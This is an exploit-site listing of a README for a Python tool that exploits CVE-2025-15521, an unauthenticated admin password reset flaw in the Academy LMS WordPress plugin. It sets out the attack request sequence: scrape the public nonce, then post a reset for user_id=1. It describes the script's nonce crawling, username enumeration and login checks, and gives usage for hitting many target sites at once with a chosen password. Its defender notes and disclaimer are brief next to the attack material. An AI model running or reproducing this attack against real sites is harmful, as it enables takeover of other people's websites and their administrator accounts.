Exploit for CVE-2025-15521

Name: Exploit for CVE-2025-15521
Rating: 5 (122 reviews)
2026-04-18 | CVSS 9.8
## https://sploitus.com/exploit?id=A016274D-6A21-5FC4-AC8D-0AEB8C8BC356
# CVE-2025-15521
The Academy LMS – WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0.


```
 _____ _____ _____     ___ ___ ___ ___     ___   ___ ___ ___ ___  
|     |  |  |   __|___|_  |   |_  |  _|___|_  | |  _|  _|_  |_  | 
|   --|  |  |   __|___|  _| | |  _|_  |___|_| |_|_  |_  |  _|_| |_
|_____|\___/|_____|   |___|___|___|___|   |_____|___|___|___|_____|
```

[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited)
[![CVE](https://img.shields.io/badge/CVE-2025--15521-CC0000?style=for-the-badge)](https://vulners.com/cve/CVE-2025-15521)
[![CVSS](https://img.shields.io/badge/CVSS-9.8_CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-15521)
[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python)](https://python.org)

> 📡 Follow **[@KNxploited](https://t.me/KNxploited)** — CVE disclosures and working exploits, no delay.



---

## What is this

**CVE-2025-15521** — Unauthenticated account takeover via password reset in **Academy LMS ≤ 3.5.0**.

The plugin's reset handler authenticates the request using only a **publicly-exposed nonce** (`academy_nonce`) embedded in course pages. No token sent to the user's email. No session check. No identity validation. An attacker who reads any course page gets a valid nonce, then resets any account's password by supplying a `user_id` — including `user_id=1` (the site admin).

**CVSS 3.1: 9.8 Critical** — `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`  
**CNA:** Wordfence

---

## How the vulnerability works

```
GET /course/any-course/
  → HTML contains: "academy_nonce": "a1b2c3d4e5"   ← public, no auth

POST /academy-retrieve-password/?user_id=1
  new_password=
  confirm_new_password=
  security=a1b2c3d4e5                               ← nonce accepted

  → Password for user_id=1 changed. No email. No confirmation.
```

The handler calls `wp_set_password()` after only verifying `wp_verify_nonce()` on a nonce that is broadcast to every visitor. There is no check that the requesting user owns the account being modified.

---

## What this script does

1. Crawls course pages to extract a live `academy_nonce`
2. Fires the reset handler for a target `user_id` with a chosen password
3. Enumerates usernames via `/?author=N` redirects and the REST API (`/wp-json/wp/v2/users`)
4. Attempts a strict login for each candidate:
   - Rejects known failure messages
   - Requires `wordpress_logged_in` cookie
   - Requires real admin UI markers in `/wp-admin` — not just a 200 response
5. Writes confirmed access entries to an output file — nothing sensitive is printed to the terminal

---

## Requirements

```bash
pip install requests colorama urllib3
```

Python 3.8+ required. Python 3.10+ recommended.

---

## Usage

```bash
python CVE-2025-15521.py
```

You will be prompted for:

```
Targets list file (one URL per line): list.txt
Threads (concurrent sites) [5]: 10
Reset handler path [/academy-retrieve-password/]:
Course root path (key source) [/course/]:
Max /course/ subpages to scan per site [15]:
user_id to reset (handler target) [1]:
New password to set [adminSA]:
HTTP timeout (seconds) [10]:
Output file [scan_results/academy_access_success.txt]:
```

Targets file — one URL per line, scheme optional:

```
https://target1.com
target2.com
https://target3.com/lms
```

---

## Output

**Terminal** — one line per target, no credentials printed:

```
[14:02:11] [https://target.com] KEY: OK   | RESET: OK   | ACCESS: 1 HIT
[14:02:13] [https://target2.com] KEY: FAIL | RESET: -    | ACCESS: 0 HIT
```

**File** — confirmed access entries only:

```
[2025-04-18T14:02:11] https://target.com - account=admin  pass=adminSA
```

---

## Detection & Remediation

**For defenders:**

Block or monitor unauthenticated POST requests to the reset endpoint:
```
POST *academy-retrieve-password* with parameter: security=
```

Check the `rm_admin_order` / `academy_nonce` exposure in your theme's course page source. If the nonce is visible without being logged in — your version is affected.

**Immediate fix steps:**
- Update Academy LMS to a version above 3.5.0
- Temporarily disable the plugin if no patch is available
- Audit recently changed admin passwords
- Force password resets on all administrator accounts
- Implement email-based token verification for any password reset flow

---

## ⚠️ Disclaimer

This tool is for authorized security research and penetration testing only.  
Only run it against systems you own or have explicit written permission to test.  
The author accepts no liability for unauthorized or illegal use.  
Unauthorized use violates CFAA, CMA, EU Directive 2013/40/EU, Saudi Anti-Cyber Crime Law No. M/17, and equivalent laws worldwide.

---

**By Nxploited (Khaled Alenazi)**  
[t.me/KNxploited](https://t.me/KNxploited) · [github.com/Nxploited](https://github.com/Nxploited)

> 🔔 Follow [@KNxploited](https://t.me/KNxploited) on Telegram for the latest CVEs and exploit releases.